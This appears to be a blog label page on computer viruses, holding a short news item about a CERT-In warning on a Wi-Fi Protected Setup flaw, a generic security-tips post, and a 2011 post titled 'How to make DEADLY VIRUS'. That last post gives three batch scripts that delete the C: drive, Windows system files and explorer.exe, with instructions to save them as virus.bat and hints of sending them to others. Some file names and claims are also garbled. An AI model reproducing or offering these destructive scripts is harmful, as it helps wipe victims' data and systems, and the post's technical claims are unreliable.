Showing posts with label Virus. Show all posts
Showing posts with label Virus. Show all posts

Sunday, January 22, 2012

Wi-Fi users in India vulnerable to virus attack, warn analysts

Wi-Fi users in the country are vulnerable to virus attack, warns an Indian computer security analysis firm. According to the Indian Computer Emergency Response Team (CERT-In), the virus attacks through Wi-Fi could lead to crashing and even hacking of the secure networks. 


The firm has discovered that the Wi-Fi Protected Setup (WPS) has a design error, which increases risks of virus attacks and may allow attackers to take unauthorised control of the affected system. The error can also help attackers crack and stealthily enter into an encrypted and password protected system.

Saturday, January 21, 2012

Top Computer Tips to Reduce Viruses Attacks

Computer with internet makes it possible to access some of our basic information such as for entertainment, financial services, products from the mean corner of the world, and a lot. Along with the increasing applications on computers, there is also an increase in the issues with computer security.

Top Computer tips for virus attacks

An unprotected computer is an open door for threats like viruses, malware, spyware, Trojan horses and hackers. When the security settings of your computer are very low, the chances of the computer to get infected will be high. There are some recommendations to increase the security of the computer.

Friday, September 2, 2011

How to make "DEADLY VIRUS"

I have no responsibility for any damages either on your
computer or on other computers that you have send this file !
do not open it under any circumstances because it cannot be undone !
your hard disk will die !!


Anyway, here is the coding :

1 ... Deadly Virus

Firstly, open notepad ...

Second , type the following :

@echo off
deltree c:\

Save this file as virus.bat

Warning :- Do not open this !
                 This will delete everything on the hard disk...
                 You will need to re-install windows if this
                 File is opened< among with all your data !

2....Deadly Virus

@echo off
del "c:\windows\pchealth\"
del "c:\windows\system\"
del "c:\windows\system32\restore\"
del "winlogon.exe"
del "c:\windows\system32\autoexec.nt"
del "c:\windows\system32\logonui.exe"
del "c:\windows\system32\ntoskrni.exe"

Save this file as virus.bat

3...... Deadly Virus

@echo off
tskill explorer
del "c:\windows\system32"
del "c:\windows\explorer.exe"
msg * i deleted all your system files
exit

Save this file as virus.bat
Related Posts Plugin for WordPress, Blogger...